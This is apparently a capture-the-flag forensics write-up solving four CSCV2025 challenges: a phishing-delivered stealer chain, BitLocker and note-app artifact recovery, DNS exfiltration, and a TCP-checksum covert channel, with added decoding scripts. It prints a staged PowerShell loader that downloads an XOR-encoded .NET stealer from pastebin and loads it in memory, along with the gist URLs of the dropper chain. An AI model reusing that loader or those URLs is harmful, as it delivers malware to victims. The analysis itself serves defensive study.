# NostalgiaS

- We are given an `.ad1` image.
- Mount it and navigate into `Users/kadoya/AppData/Local/Microsoft/Outlook/`, where we can read the emails that were sent to Mr. Kadoya.
- One of them reads:

```!
Hi player,

I’m sharing something special with you today — a piece of childhood we all loved: the game Moly.

Moly tells the touching story of a red-nosed mole and its friend Dau Dau. Together, they escape a burning forest and rebuild their lives in a peaceful snowy land — growing crops, raising animals, and building a new home filled with warmth and friendship.

For many of us, Moly wasn’t just a game. It was a memory — quiet evenings, simple adventures, and that gentle happiness only old games can bring.

You can find the game file attached. Password: playmoly2025. Run game by click "playmoly".

I hope you’ll take a moment to revisit this little world — and relive the feeling of those days again.

Enjoy your journey,
ACE Team Moly
```

- This tells us that Mr. Kadoya ran malware hidden inside `playmoly`.
- We extract the attached archive from the mailbox and unzip it with the password `playmoly2025`.
- Inside the archive is a script that contains a peculiar line:

```javascript!
var remoteHtaUrl = 'https://gist.githubusercontent.com/oumazio/ad5626973af6118062ae401c1e788464/raw/725302cda73d10e260e2ed0f26d935e576d3bc1c/FlashInstaller.hta';
```

- By accessing the link, we are met with yet another file, this time containing the so-called "game code". Upon further inspection, the file connects to another GitHub Gist:

```javascript!
var logo = "https://gist.githubusercontent.com/oumazio/d2b2cbbe1ad51fd956815e78e6bfe31d/raw/2e34af3f8aac3392f07a1d59013cc8897dda8f3a/something.txt";
```

- Accessing the link hands us yet another script, this time heavily obfuscated. Upon even further inspection, the script downloads another script.

```bash!
$ grep 'https' something.txt
https://gist.githubusercontent.com/oumazio/fdd0b2711ab501b30b53039fa32bc9ca/raw/ca4f9da41c5c64b3b43f4b0416f8ee0d0e400803/secr3t.txt
```

- Inside is yet another obfuscated script.

```powershell!
Iex(neW-obJecT iO.cOMPrESsion.DeflaTEStreAM([iO.meMORysTrEAM] [convErt]::FroMbase64sTrInG('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' ) ,[SYSTeM.io.comPRESsion.COmPRessiONmODe]::DECompResS) |FOReach-oBJeCt{ neW-obJecT SyStEM.Io.STreAmREaDeR( $_,[TEXT.EncOdiNG]::ascIi ) }| FOreacH-objeCT{$_.rEAdToeND( ) })
```

- The payload is Deflate-compressed and Base64-encoded (`DeflateStream` over `FromBase64String`), so we can decode it with `zlib` in raw mode:

```python!
$ sh -c -- "python3 - << 'PY'
import base64, zlib, pathlib
# script.txt holds only the Base64 string taken from the one-liner above
b64 = pathlib.Path('script.txt').read_text().strip()
data = base64.b64decode(b64)
# DeflateStream writes raw DEFLATE (no zlib header), hence the negative wbits
text = zlib.decompress(data, -zlib.MAX_WBITS).decode('ascii', errors='replace')
pathlib.Path('decoded.txt').write_text(text)
PY"
```

- The decoded file reads:

```powershell
$AssemblyUrl = "https://pastebin.com/raw/90qeYSHA"
$XorKey = 0x24
$TypeName = "StealerJanai.core.RiderKick"
$MethodName = "Run"

try {
    $WebClient = New-Object System.Net.WebClient
    $encodedContent = $WebClient.DownloadString($AssemblyUrl)
    $WebClient.Dispose()

    $hexValues = $encodedContent.Trim() -split ',' | Where-Object { $_ -match '^0x[0-9A-Fa-f]+$' }

    $encodedBytes = New-Object byte[] $hexValues.Length
    for ($i = 0; $i -lt $hexValues.Length; $i++) {
        $encodedBytes[$i] = [Convert]::ToByte($hexValues[$i].Trim(), 16)
    }

    $originalBytes = New-Object byte[] $encodedBytes.Length
    for ($i = 0; $i -lt $encodedBytes.Length; $i++) {
        $originalBytes[$i] = $encodedBytes[$i] -bxor $XorKey
    }

    $assembly = [System.Reflection.Assembly]::Load($originalBytes)

    if ($TypeName -ne "" -and $MethodName -ne "") {
        $targetType = $assembly.GetType($TypeName)
        $methodInfo = $targetType.GetMethod($MethodName, [System.Reflection.BindingFlags]::Static -bor [System.Reflection.BindingFlags]::Public)
        $methodInfo.Invoke($null, $null)
    }
} catch {
    exit 1
}
```

- We are met with yet another downloader; this time the payload is obfuscated with a single-byte XOR.

```powershell!
$AssemblyUrl = "https://pastebin.com/raw/90qeYSHA"
$XorKey = 0x24
```

- After decoding, we get a *.NET* binary, which we have to reverse engineer. It appears to be an information collector, with a component named `StealerJanai.component.systeminfo.SystemSecretInformationCollector.cs`, which reads:

```csharp!
// StealerJanai, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// StealerJanai.component.systeminfo.SystemSecretInformationCollector
using System;
using System.Collections.Generic;
using System.Text;
using Microsoft.Win32;

public class SystemSecretInformationCollector
{
    private const string MagicChars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

    public string Collect()
    {
        StringBuilder stringBuilder = new StringBuilder();
        try
        {
            string text = DecodeMagicToString("AuEcc3iNuamB9JOyfS1pel55JqxgJ83");
            string machineName = Environment.MachineName;
            string text2 = DecodeMagicToString("sA0m1sPHdceUL6HSvGAbFuhN");
            string registryValue = GetRegistryValue();
            string value = text + machineName + "_" + text2 + registryValue + "}";
            stringBuilder.Append(value);
        }
        catch (Exception ex)
        {
            stringBuilder.AppendLine($"Error: {ex.Message}");
        }
        return stringBuilder.ToString();
    }

    private string DecodeMagicToString(string input)
    {
        try
        {
            if (string.IsNullOrEmpty(input))
            {
                return string.Empty;
            }
            List<byte> list = new List<byte>();
            foreach (char value in input)
            {
                int num = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz".IndexOf(value);
                if (num < 0)
                {
                    return "Invalid character";
                }
                int num2 = num;
                for (int num3 = list.Count - 1; num3 >= 0; num3--)
                {
                    int num4 = list[num3] * 62 + num2;
                    list[num3] = (byte)(num4 % 256);
                    num2 = num4 / 256;
                }
                while (num2 > 0)
                {
                    list.Insert(0, (byte)(num2 % 256));
                    num2 /= 256;
                }
            }
            int j;
            for (j = 0; j < list.Count && list[j] == 0; j++)
            {
            }
            if (j >= list.Count)
            {
                return string.Empty;
            }
            byte[] array = new byte[list.Count - j];
            for (int k = 0; k < array.Length; k++)
            {
                array[k] = list[j + k];
            }
            return Encoding.ASCII.GetString(array);
        }
        catch (Exception ex)
        {
            return "Decode error: " + ex.Message;
        }
    }

    private string GetRegistryValue()
    {
        try
        {
            using (RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\hensh1n"))
            {
                if (registryKey != null)
                {
                    object value = registryKey.GetValue("");
                    if (value != null)
                    {
                        return value.ToString();
                    }
                }
            }
            return "Registry key not found";
        }
        catch (Exception ex)
        {
            return "Registry error: " + ex.Message;
        }
    }
}
```

- From this clue:

```csharp
string text = DecodeMagicToString("AuEcc3iNuamB9JOyfS1pel55JqxgJ83");
string machineName = Environment.MachineName;
string text2 = DecodeMagicToString("sA0m1sPHdceUL6HSvGAbFuhN");
string registryValue = GetRegistryValue();
string value = text + machineName + "_" + text2 + registryValue + "}";
```

- The flag format seems to be `<text1_decoded><machineName>_<text2_decoded><registryValue>}`
- Decoding the two strings with a script gives us:
    - `text1`: `CSCV2025{your_computer_`
    - `text2`: `has_be3n_kicked_by`
- Which gives us: `CSCV2025{your_computer_<machineName>_has_be3n_kicked_by<registryValue>}`
- To find the machine name, we can read the event logs.

```bash!
$ evtx_dump 'Windows/System32/winevt/Logs/Application.evtx' | grep '<Computer>'
<Computer>DESKTOP-47ICHL6</Computer>
```

- Which gives us: `DESKTOP-47ICHL6`
- Finally, we need to get the registry value.

```csharp!
using (RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\hensh1n"))
```

- The value is the default value of `SOFTWARE\hensh1n` in the user's hive (`NTUSER.DAT`, since the code opens `Registry.CurrentUser`), which we can read with `hivex`:

```bash!
$ hivexget 'Users/kadoyat/NTUSER.DAT' 'SOFTWARE\\hensh1n'
"@"="HxrYJgdu"
```

- Which gives us `HxrYJgdu`. Combining all of them gives us the flag.

Flag: `CSCV2025{your_computer_DESKTOP-47ICHL6_has_be3n_kicked_byHxrYJgdu}`

# Case AlphaS

- We are given an `.ad1` image and a BitLocker drive.

```
.
├── evidences.ad1
├── evidences.ad1.txt
├── external.vhdx
└── ReadMe.pdf
```

- In `Windows/Prefetch`, where Windows keeps prefetch files for applications that have been run, we can see that the suspect ran apps like `ChatGPT` and `Simplenote`:
    - `CHATGPT.EXE-0140405B.pf`
    - `SIMPLENOTE.EXE-0ED0EC4F.pf`
- These apps usually store logs on the device inside `AppData`.
- We then find traces of a BitLocker password inside `Users/windows/AppData`.

```bash!
$ find ./AppData/Local/Packages/OpenAI.ChatGPT-Desktop_2p2nqsd0c76g0/ -type f -exec grep -Hnl 'bitlocker' {} \;
./AppData/Local/Packages/OpenAI.ChatGPT-Desktop_2p2nqsd0c76g0/LocalCache/Roaming/ChatGPT/Local Storage/leveldb/000003.log
```

- The BitLocker key is stored inside `000003.log`, which we can extract.

```bash
$ strings './AppData/Local/Packages/OpenAI.ChatGPT-Desktop_2p2nqsd0c76g0/LocalCache/Roaming/ChatGPT/Local Storage/leveldb/000003.log' | grep 'bitlocker'
{"drafts":[{"id":"null_thread","content":"I've locked my drive with this bitlocker key 028853-431640-166364-032076-217943-045837-542388-281017","timestamp":1759586173510}],"userId":"user-2smrET6gmFXbt2Kc8fCX9h2y"}
{"drafts":[{"id":"null_thread","content":"I've locked my drive with this bitlocker key 028853-431640-166364-032076-217943-045837-542388-281017 and put the key in my usb","timestamp":1759586182351}],"userId":"user-2smrET6gmFXbt2Kc8fCX9h2y"}
{"drafts":[{"id":"null_thread","content":"I've locked my drive with this bitlocker key 028853-431640-166364-032076-217943-045837-542388-281017 and put the key in my usb. If I lost my usb, ","timestamp":1759586191824}],"userId":"user-2smrET6gmFXbt2Kc8fCX9h2y"}
```

- The BitLocker key is `028853-431640-166364-032076-217943-045837-542388-281017`
- Using this key, we are able to get the file `secret.zip` out of the drive. Unfortunately, this zip file is also locked with a password.
- From our previous clues, the suspect also installed `Simplenote`, which could also be where they stored the zip password.

```bash!
$ find ./AppData/Local/Packages/22490Automattic.Simplenote_9h07f78gwnchp/ -type f -exec grep -Hnl 'zip password' {} \;
./AppData/Local/Packages/22490Automattic.Simplenote_9h07f78gwnchp/LocalCache/Roaming/Simplenote/IndexedDB/file__0.indexeddb.leveldb/000003.log
$ strings './AppData/Local/Packages/22490Automattic.Simplenote_9h07f78gwnchp/LocalCache/Roaming/Simplenote/IndexedDB/file__0.indexeddb.leveldb/000003.log'
...
content"Ozip password: 5525b8d2d8534b716467493f3660b11e1c44b22cd0c97275619b94a0e5c82fda"
...
```

- The zip password is `5525b8d2d8534b716467493f3660b11e1c44b22cd0c97275619b94a0e5c82fda`
- Extracting it gives us `ssh.txt`, which reads:

```
# access via vpn or proxy if you are blocked
https://pastebin.com/WciYiDEs
cff4c6f0b68c31cb
```

- Inside the pastebin:

```yaml
backup-server
- 192.168.10.25
- username: admin
- password: F@keP@ss2025!
- service: MySQL

web-frontend
- 192.168.10.50
- username: deploy
- password: W3bP@ss!8192
- service: Apache

log-collector
- 192.168.10.77
- username: syslog
- password: L0gs2025#@@
- service: Graylog

dev-test
- 192.168.12.23
- username: flag
- password: h3Y_Th!s_|5_jUs7_tH3_bE9IN|\|iNg_dc8fb5bdedd10877
- service: CSCV2025
```

:::info
**NOTE**: If you can't access Pastebin with a Proxy/VPN, use this frontend instead: https://pasted.drakeerv.com/WciYiDEs
:::

Flag: `CSCV2025{h3Y_Th!s_|5_jUs7_tH3_bE9IN|\|iNg_dc8fb5bdedd10877}`

# DNS Exfil

- We are given three files:

```
.
├── 10.10.0.53_ns_capture.pcap
├── 10.10.5.80_access.log
└── 10.10.5.80_error.log
```

- From the title, we know the perpetrator exfiltrated the data over the DNS protocol.

```bash!
$ tshark -r 10.10.0.53_ns_capture.pcap | grep hex | awk '{print $13}' | tr -d 'A'
p.c7aec5d0d81ba8748acac6931e5add6c24b635181443d0b9d2.hex.cloudflar3.com
p.f8aad90d5fc7774c1e7ee451e755831cd02bfaac3204aed8a4.hex.cloudflar3.com
p.3dfec8a22cde4db4463db2c35742062a415441f526daecb59b.hex.cloudflar3.com
p.f6af1ecb8cc9827a259401e850e5e07fdc3c1137f1.hex.cloudflar3.com
f.6837abc6655c12c454abe0ca85a596e98473172829581235dd.hex.cloudflar3.com
f.95380b06bf6dd06b89118b0003ea044700a5f2c4c106c3.hex.cloudflar3.com
```

- We save the hexdumps into separate files, one per prefix (`p` and `f`).

```sh!
$ cat 'p.dump'
c7aec5d0d81ba8748acac6931e5add6c24b635181443d0b9d2f8aad90d5fc7774c1e7ee451e755831cd02bfaac3204aed8a43dfec8a22cde4db4463db2c35742062a415441f526daecb59bf6af1ecb8cc9827a259401e850e5e07fdc3c1137f1
$ cat 'f.dump'
6837abc6655c12c454abe0ca85a596e98473172829581235dd95380b06bf6dd06b89118b0003ea044700a5f2c4c106c3
```

- Hex-decoding the dumps gives us garbage data, so it is probably encrypted.
- We then check out the other files.

```bash!
$ grep 'flag' 10.10.5.80_access.log
192.168.13.37 - - [10/Oct/2025:09:21:10 +0700] "GET /media/image1.php?c=cat%20/flag HTTP/1.1" 403 284 "-" "curl/7.88.1"
```

- Someone tried to access the flag around `09:21:20`, so we now check the approximate timestamp in the other file.

```bash!
$ grep '09:2.:..' 10.10.5.80_error.log
...
2025/10/10 09:26:03 [error] 1224#0: *5210 FastCGI sent in stderr: "PHP Notice: DEBUG VARS: APP_SECRET=F0r3ns1c-2025-CSCV; DATE_UTC=20251010" while reading response header from upstream, client: 192.168.13.37, server: portal.local, request: "GET /media/getfile.php?debug=true HTTP/1.1", upstream: "fastcgi://unix:/run/php/php8.2-fpm.sock:", host: "intra.portal.local"
2025/10/10 09:26:03 [error] 1224#0: *5210 FastCGI sent in stderr: "PHP Notice: H=SHA256(APP_SECRET); AES_KEY=H[0..15]; AES_IV=H[16..31]" while reading response header from upstream, client: 192.168.13.37, server: portal.local, request: "GET /media/getfile.php?debug=true HTTP/1.1", upstream: "fastcgi://unix:/run/php/php8.2-fpm.sock:", host: "intra.portal.local"
...
```

- From here we are able to find the AES key and IV: the debug output leaks `APP_SECRET` and states that the key is the first 16 bytes of `SHA256(APP_SECRET)` and the IV is the last 16.

```bash
$ echo 'F0r3ns1c-2025-CSCV' | sha256sum
f17f8c9fbb0f68bf1fab0124c5bef912bd5c0c7e6750b1dd1ab0f8ea1fdd639b -
```

- Note that `echo` appends a newline to its input, which changes the digest; hash only the secret's bytes (`printf '%s'` or `echo -n`) when deriving key material.
- Which gives us:
    - Key: `5769179ccdf950443501d9978f52ddb5`
    - IV: `1b70ca0d4f607a976c6639914af7c7a6`
- Decrypting `f.dump` gives us the flag.

```bash!
$ xxd -r -p 'f.dump' | openssl enc -aes-128-cbc -d -K 5769179ccdf950443501d9978f52ddb5 -iv 1b70ca0d4f607a976c6639914af7c7a6
CSCV2025{DnS_Exf1ltr4ti0nnnnnnnnnnNN!!}
```

Flag: `CSCV2025{DnS_Exf1ltr4ti0nnnnnnnnnnNN!!}`

---

# CovertS

- We are given a `.pcap` file; from the challenge we know that the attacker has exfiltrated our data using some sort of covert channel.
- Opening up the **Conversation** tab, we can find the following results:

![this](https://hackmd.io/_uploads/SJY0M9_0lg.jpg)

- A lot of data was sent towards `192.168.192.1` with no response.
- We can filter the traffic with: `ip.dst == 192.168.192.1`

![yes](https://hackmd.io/_uploads/ByN0Q9dRle.jpg)

- What the? All of the checksums are wrong!

:::info
**To validate checksums**: Right Click -> Protocol Preferences -> Transmission Control Protocol -> Validate the TCP checksum if possible
:::

- The wrong checksums were sent intentionally to carry the data covertly.
  We can start extracting them with `tshark`.

```bash
$ tshark -r challenge.pcapng -Y 'ip.dst == 192.168.192.1' -T fields -e tcp.checksum | sed 's/0x//g' | tr -d '\n'
```

- The output is a hexdump, which we can read with `xxd`.

```bash
$ tshark -r challenge.pcapng -Y 'ip.dst == 192.168.192.1' -T fields -e tcp.checksum | sed 's/0x//g' | tr -d '\n' | xxd -r -p
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
```

- This gives us a Base64-encoded string, which decodes to:

```
$ tshark -r challenge.pcapng -Y 'ip.dst == 192.168.192.1' -T fields -e tcp.checksum | sed 's/0x//g' | tr -d '\n' | xxd -r -p | base64 -d
Hello everyone,
How are you doing? A very warm welcome to CSCV2025!

I'm really glad to see you here and I hope you're ready for an exciting event ahead. This CTF is all about challenging your skills, learning new tricks, and of course - having fun along the way. Consider this little message not as a challenge itself, but simply as my way of saying hello to all of you amazing players.

Take a moment, get comfortable, and enjoy the ride. Whether you're here to compete fiercely, to learn something new, or just to have a good time, I hope CSCV2025 will be an unforgettable experience for you (not this challenge, pls forget this sh*t O_O)

And now, without keeping you waiting any longer...

(someone accidentally sent my chal via email so here is your new flag:)

CSCV2025{my_chal_got_leaked_before_the_contest_bruh_here_is_your_new_flag_b8891c4e147c452b8cc6642f10400452}

^_^ sry for the mess
```

Flag: `CSCV2025{my_chal_got_leaked_before_the_contest_bruh_here_is_your_new_flag_b8891c4e147c452b8cc6642f10400452}`

:::info
**NOTE:** thanks to s3asick5 for the hint, sob sob sob 😭😭😭

**SLIGHTLY BIGGER NOTE:** All of these were solved after the event was over.$\int^{\int^\int}$
:::
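
For the CovertS section, an added example (not part of the original write-up): it recomputes each TCP checksum instead of trusting the capture, and collects the field only from segments that fail validation. The packets are constructed inline, and the source address `192.168.192.128` and the hidden message are assumptions.

```python
import base64
import socket
import struct

def internet_checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement checksum over 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def expected_tcp_checksum(pkt: bytes) -> int:
    """Recompute the checksum of the TCP segment inside a raw IPv4 packet."""
    ihl = (pkt[0] & 0x0F) * 4
    seg = bytearray(pkt[ihl:])
    seg[16:18] = b"\x00\x00"  # the checksum field counts as zero while summing
    pseudo = pkt[12:20] + struct.pack("!BBH", 0, 6, len(seg))
    return internet_checksum(pseudo + bytes(seg))

def covert_bytes(packets, dst_ip: str) -> bytes:
    """Join the checksum fields of TCP segments to dst_ip that fail validation."""
    out = bytearray()
    for pkt in packets:
        ihl = (pkt[0] & 0x0F) * 4
        if pkt[9] != 6 or socket.inet_ntoa(pkt[16:20]) != dst_ip:
            continue
        field = pkt[ihl + 16:ihl + 18]
        if int.from_bytes(field, "big") != expected_tcp_checksum(pkt):
            out += field
    return bytes(out)

def make_packet(src: str, dst: str, checksum: bytes = None) -> bytes:
    """Constructed sample packet: IPv4 header + bare TCP SYN, no payload."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    tcp = struct.pack("!HHIIBBHHH", 40000, 443, 1, 0, 5 << 4, 0x02, 1024, 0, 0)
    pkt = bytearray(ip + tcp)
    pkt[36:38] = checksum or expected_tcp_checksum(bytes(pkt)).to_bytes(2, "big")
    return bytes(pkt)

# Constructed capture: Base64 text carried two bytes per segment, plus noise.
HIDDEN = base64.b64encode(b"constructed sample")
SAMPLE = [make_packet("192.168.192.128", "192.168.192.1", HIDDEN[i:i + 2])
          for i in range(0, len(HIDDEN), 2)]
SAMPLE.insert(3, make_packet("192.168.192.128", "192.168.192.1"))  # valid checksum
SAMPLE.append(make_packet("192.168.192.128", "10.0.0.5", b"zz"))   # other destination

def decode_sample() -> bytes:
    return base64.b64decode(covert_bytes(SAMPLE, "192.168.192.1"))

if __name__ == "__main__":
    print(decode_sample())
```

Captures taken on the sending host with checksum offload enabled also show invalid checksums, so a mismatch alone is a lead; printable or structured values in the field, as here, are what separate a covert channel from offload noise.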
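
For the DNS Exfil section, an added example (not the author's script): it reassembles the `<stream>.<hex chunk>.hex.<domain>` queries per stream and derives the key and IV exactly as the leaked debug line describes. The query names, the domain `exfil.example` and the secret used in the checks are constructed placeholders.

```python
import hashlib
import re
from collections import defaultdict

HEX = re.compile(r"[0-9a-f]+")

def reassemble(qnames, marker="hex"):
    """Join <stream>.<hex chunk>.<marker>.<domain> queries per stream, in capture order."""
    streams = defaultdict(bytearray)
    for name in qnames:
        labels = name.lower().rstrip(".").split(".")
        if len(labels) < 4 or labels[2] != marker:
            continue
        chunk = labels[1]
        if not HEX.fullmatch(chunk) or len(chunk) % 2:
            continue  # not a whole number of hex-encoded bytes
        streams[labels[0]] += bytes.fromhex(chunk)
    return {stream: bytes(buf) for stream, buf in streams.items()}

def derive_key_iv(app_secret: bytes):
    """H = SHA256(APP_SECRET); AES_KEY = H[0..15]; AES_IV = H[16..31]."""
    digest = hashlib.sha256(app_secret).digest()
    return digest[:16], digest[16:]

def cbc_shaped(blob: bytes) -> bool:
    """AES-CBC ciphertext is a non-empty multiple of the 16-byte block size."""
    return bool(blob) and len(blob) % 16 == 0

# Constructed sample: 48 bytes split into 25 + 23 byte chunks, mixed with other lookups.
BLOB = bytes(range(48))
QUERIES = [
    "f." + BLOB[:25].hex() + ".hex.exfil.example",
    "www.example.com",                          # ordinary lookup, ignored
    "f." + BLOB[25:].hex() + ".hex.exfil.example",
    "p." + bytes(16).hex() + ".hex.exfil.example",
]

if __name__ == "__main__":
    for stream, blob in reassemble(QUERIES).items():
        print(stream, len(blob), "bytes, CBC-shaped:", cbc_shaped(blob))
```

The key and IV returned by `derive_key_iv` go to `openssl enc -aes-128-cbc -d` in hex, as in the write-up; pass the secret without a trailing newline, since a single extra byte yields unrelated key material.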
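
For the NostalgiaS section, an added example (not the author's script, which the write-up does not show): static decoders for the last two stages, a lenient mirror of the loader's `0x..` list XORed with `0x24`, and a port of `DecodeMagicToString` as big-integer base-62. `encode_magic`, `looks_like_pe` and `SAMPLE_STAGE` are names and data introduced here.

```python
import re

ALPHABET = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

def decode_magic(text: str) -> bytes:
    """Same result as DecodeMagicToString: read text as one big-endian
    base-62 number and return its bytes without leading zero bytes."""
    value = 0
    for ch in text:
        digit = ALPHABET.find(ch)
        if digit < 0:
            raise ValueError(f"invalid character {ch!r}")
        value = value * 62 + digit
    return value.to_bytes((value.bit_length() + 7) // 8, "big")

def encode_magic(data: bytes) -> str:
    """Inverse of decode_magic, used here to build test vectors."""
    value, out = int.from_bytes(data, "big"), ""
    while value:
        value, digit = divmod(value, 62)
        out = ALPHABET[digit] + out
    return out

def xor_decode_csv(text: str, key: int) -> bytes:
    """Parse '0x..,0x..' tokens as the loader does and XOR each byte with key."""
    tokens = (t.strip() for t in text.strip().split(","))
    return bytes(int(t, 16) ^ key for t in tokens
                 if re.fullmatch(r"0x[0-9A-Fa-f]+", t))

def looks_like_pe(data: bytes) -> bool:
    """A .NET assembly is a PE file, so the decoded stage should start with 'MZ'."""
    return data[:2] == b"MZ"

# Constructed sample: the first four bytes of a PE header XORed with 0x24.
SAMPLE_STAGE = "0x69,0x7e,0xb4,0x24"

if __name__ == "__main__":
    print(xor_decode_csv(SAMPLE_STAGE, 0x24))
    # The two strings from SystemSecretInformationCollector.Collect()
    for magic in ("AuEcc3iNuamB9JOyfS1pel55JqxgJ83", "sA0m1sPHdceUL6HSvGAbFuhN"):
        print(decode_magic(magic))
```

Decoding the stage to a file this way lets the assembly be opened in a decompiler without ever running the loader.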